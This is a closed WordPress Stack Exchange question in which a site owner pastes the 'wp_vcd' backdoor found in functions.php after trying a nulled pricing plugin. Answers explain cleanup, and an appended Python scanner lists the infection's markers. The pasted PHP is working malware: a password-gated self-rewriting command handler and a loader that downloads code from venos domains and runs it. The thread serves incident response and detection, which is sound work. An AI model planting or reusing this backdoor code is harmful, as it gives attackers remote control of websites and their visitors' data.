
plugins - My Wordpress website was hacked

Closed. This question is off-topic. It is not currently accepting answers.

Questions that are too localized (such as syntax errors, code with restricted access, hacked sites, hosting or support issues) are not in scope. See how do I ask a good question?

Closed 5 years ago.


Today while working, I had tried to install Go Pricing Plugin from this website.

https://www.downloadfreethemes.download/go-pricing-v3-3-8-wordpress-responsive-pricing-tables/

It was unsuccessful the first time, then I tried several times but with no result. Then after some time, my website went blank. I searched for XAMPP errors and tried to deactivate plugins from the database (I could not access admin nor frontend).

Then finally, I have found this code in function.php

Is it something I have to worry about? Is there any place where I can still find this code on my WordPress?

Now I have removed this code from function.php and the website is working fine, but I am afraid that my passwords and other things are being uploaded somewhere.

Is there something I have to remove?

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'b08494ffce10b7c547993599bd7deb9e'))
{
    $div_code_name="wp_vcd";

    switch ($_REQUEST['action'])
    {
        case 'change_domain';
            if (isset($_REQUEST['newdomain']))
            {
                if (!empty($_REQUEST['newdomain']))
                {
                    if ($file = @file_get_contents(__FILE__))
                    {
                        if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                        {
                            $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
          break;

        case 'change_code';
            if (isset($_REQUEST['newcode']))
            {
                if (!empty($_REQUEST['newcode']))
                {
                    if ($file = @file_get_contents(__FILE__))
                    {
                        if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                        {
                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
          break;

        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    die("");
}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;

if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }


        $wp_auth_key='322f4f8d2d11134e9bedae0c97257b9d';
        if (($tmpcontent = @file_get_contents("http://www.venos/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.venos/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }


        elseif ($tmpcontent = @file_get_contents("http://www.venos.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

     if (stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
            @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

            if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                    @file_put_contents('wp-tmp.php', $tmpcontent);
                }
            }

        }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif (($tmpcontent = @file_get_contents("http://www.venos.pw/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.venos.pw/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        }
    }
}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp
asked Nov 9, 2017 at 17:30 by Harshad Gole; edited Nov 9, 2017 at 21:48 by fuxia
  • Moral: never ever install nulled plugins or themes on your website. Glad you have regained access to your website; you should back up your database and change your passwords. Install the Wordfence Security plugin and do a full scan. Good luck! – Elyes At. Commented Nov 10, 2017 at 2:03

4 Answers


It's good that you've regained access to your website, but without any further action, you'll get hacked again. These are the steps to take in order to clean and secure your site:

  1. do not panic ( very important )

  2. do not remove anything yourself

  3. install and activate Wordfence Security plugin

  4. in Wordfence -> Options, select everything to scan

  5. run Wordfence -> Scan, and follow instructions provided

  6. repeat step 5, until the scan shows no problems

  7. set up the firewall in Wordfence

  8. make a full backup of your site, and remember to do it frequently

If the above procedure does not work at any stage, hire a professional!

Note: it is possible that the plugin you've attempted to install caused this infection. Be very careful installing plugins from unknown sources. Try first to search for plugins in the official WordPress repository.

This occurs by using NULLED themes and plugins

You have to know that everything nulled is contaminated by malicious code.

When Nulled is installed, the code wakes up at a certain moment, goes through all the folders of your hosting, installs a script in functions.php and adds several files in wp-includes or wp-admin.

wp-vcd.php

wp-tmp.php

AND ALSO modifies

post.php

functions.php

I never install plugins that come from non-WP-repository sources. Just not worth it, IMHO.

That said, you should uninstall the plugin, then delete it, then make sure the plugin folder is deleted. I would also reinstall WP core, and all themes (remove any plugins/themes that you do not use). I have not used WordFence, so cannot comment on it.

But I have cleaned up some sites, and wrote up a guide for that here that might be helpful. Some would say 'nuke from orbit', but I've found that the things mentioned in my guide work just fine ... at least in the sites that I have cleaned up.

Good luck!

I had the same issue and fixed it by doing the below steps:

  1. Delete extra code from the "wp-includes/post.php" eg:

     if (file_exists(dirname(__FILE__) . '/wp-vcd.php'))
       include_once(dirname(__FILE__) . '/wp-vcd.php');

  2. Delete 2 files: "wp-includes/wp-tmp.php" & "wp-includes/wp-vcd.php"

  3. Open "themes/your theme [parent & child ]/functions.php" and delete injected code.

  4. remove from "mysqlM"

PLEASE DON'T DOWNLOAD/INSTALL FROM THIRD-PARTY PLUGIN HACKER/PROVIDERS "They are actual MF"

Hope this will help someone.
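
The indicators named in the question's code and in the answers above (the dropped `wp-vcd.php` / `wp-tmp.php` files, the `wp_vcd` and `//$start_wp_theme_tmp` markers, the `theme_temp_setup` loader, and the `include_once` line in `post.php`) can be checked with a read-only scan before anything is deleted. This is an added example, not code from any of the posts; the function names and the sample tree it builds are constructed for illustration.

```python
from pathlib import Path
import re
import tempfile

# Indicators taken from the injected code and the answers on this page.
DROPPED_FILES = {"wp-vcd.php", "wp-tmp.php"}
MARKERS = {
    "wp_vcd marker": re.compile(rb"\$div_code_name\s*=\s*[\"']wp_vcd[\"']"),
    "payload slot": re.compile(rb"//\$start_wp_theme_tmp"),
    "temp-file loader": re.compile(rb"function\s+theme_temp_setup\s*\("),
    "dropper include": re.compile(rb"include_once\s*\(.*wp-(vcd|tmp)\.php"),
}

def scan_wordpress(root):
    """Return sorted (relative_path, reason) findings; never modifies files."""
    root = Path(root)
    findings = []
    for path in root.rglob("*.php"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name in DROPPED_FILES:
            findings.append((rel, "dropped file"))
        data = path.read_bytes()
        for reason, pattern in MARKERS.items():
            if pattern.search(data):
                findings.append((rel, reason))
    return sorted(findings)

def build_sample_tree():
    """Constructed sample: infected core file and theme, one clean theme."""
    root = Path(tempfile.mkdtemp(prefix="wpscan_"))
    samples = {
        "wp-includes/post.php": "<?php\nif (file_exists(dirname(__FILE__) . '/wp-vcd.php'))\n  include_once(dirname(__FILE__) . '/wp-vcd.php');\n",
        "wp-includes/wp-vcd.php": "<?php // constructed placeholder\n",
        "wp-content/themes/demo/functions.php": '<?php\n$div_code_name = "wp_vcd";\n//$start_wp_theme_tmp\n//$end_wp_theme_tmp\n',
        "wp-content/themes/clean/functions.php": "<?php\nadd_action('init', 'demo_init');\n",
    }
    for rel, body in samples.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return root

if __name__ == "__main__":
    for rel, reason in scan_wordpress(build_sample_tree()):
        print(f"{rel}: {reason}")
```

Point `scan_wordpress()` at the real WordPress root to list every theme and core file that still carries the injection; a clean result for these markers does not rule out other changes made by the downloaded payload.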
